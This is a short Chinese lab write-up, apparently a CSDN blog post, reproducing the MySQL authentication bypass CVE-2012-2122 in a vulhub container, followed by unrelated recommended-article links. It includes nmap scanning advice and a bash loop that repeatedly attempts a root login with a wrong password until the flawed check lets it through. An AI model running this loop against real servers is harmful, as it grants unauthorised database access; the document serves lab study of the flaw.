CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入

使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开

docker ps 展示所有正在使用的容器

docker stop +容器的id 关闭容器

相关推荐
时序数据说40 分钟前
时序数据库的存储之道:从数据特性看技术要点
大数据·数据库·物联网·开源·时序数据库·iotdb
鸥梨菌Honevid1 小时前
QT解析文本框数据——概述
数据库·qt·mysql
今天又得骑车了2 小时前
一、MySQL 8.0 之《EXPLAIN ANALYZE 执行计划》
数据库·mysql·database
icecreamstorm2 小时前
MySQL 事务 最全入门
后端·mysql
weixin_420571872 小时前
Windos服务器升级MySQL版本
运维·服务器·mysql
万能小锦鲤2 小时前
《Java EE与中间件》实验三 基于Spring Boot框架的购物车
java·spring boot·mysql·实验报告·购物车·文档资源·java ee与中间件
Hoking2 小时前
CentOS7环境安装包部署并配置MySQL5.7
mysql
野犬寒鸦2 小时前
MyBatis-Plus 中使用 Wrapper 自定义 SQL
java·数据库·后端·sql·mybatis
我爱一条柴ya3 小时前
【AI大模型】RAG系统组件:向量数据库(ChromaDB)
数据库·人工智能·pytorch·python·ai·ai编程
北北~Simple3 小时前
第一次搭建数据库
服务器·前端·javascript·数据库